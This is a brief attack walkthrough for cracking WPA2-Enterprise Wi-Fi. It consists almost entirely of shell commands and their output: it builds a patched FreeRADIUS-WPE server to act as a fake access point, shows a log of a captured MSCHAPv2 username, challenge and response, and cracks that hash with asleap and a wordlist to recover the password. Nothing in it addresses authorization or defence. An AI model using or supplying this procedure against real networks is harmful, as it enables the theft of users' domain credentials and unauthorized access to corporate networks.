# Cracking WPA2 enterprise wireless networks with Freeradius WPE and a fake AP


# wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2
# wget --no-check-certificate https://raw.github.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch
# tar xvjf freeradius-server-2.1.12.tar.bz2
# cd freeradius-server-2.1.12
# patch -p1 < ../freeradius-wpe.patch
# ./configure
# make
# make install
# ldconfig
# cd /usr/local/etc/raddb/certs/
# ./bootstrap
# /usr/local/sbin/radiusd -v
radiusd: FreeRADIUS-WPE Version 2.1.12
# grep with_ntdomain_hack /usr/local/etc/raddb/modules/mschap
with_ntdomain_hack = yes
# radiusd -X

# cat /usr/local/var/log/radius/freeradius-server-wpe.log
mschap: Sun Jan 31 22:00:00 2016

 username: aaaaaaa
 challenge: 6e:61:f4:26:7a:c5:96:12
 response: 0c:b6:46:9e:0f:70:fb:e7:ba:6b:0d:72:7a:71:63:fa:c2:e3:5b:c5:eb:04:6c:b5
 john NETNTLM: aaaaaaa:$NETNTLM$6e61f4267ac59612$0cb6469e0f70fbe7ba6b0d727a7163fac2e35bc5eb046cb5

# asleap -C 6e:61:f4:26:7a:c5:96:12 -R 0c:b6:46:9e:0f:70:fb:e7:ba:6b:0d:72:7a:71:63:fa:c2:e3:5b:c5:eb:04:6c:b5 -W dictionary.txt

 hash bytes: 5b0a
 NT hash: 2aff86e7f6e8bd54841a7981c0a55b0a
 password: bbbbbbbb

Reference:

https://github.com/brad-anton/freeradius-wpe
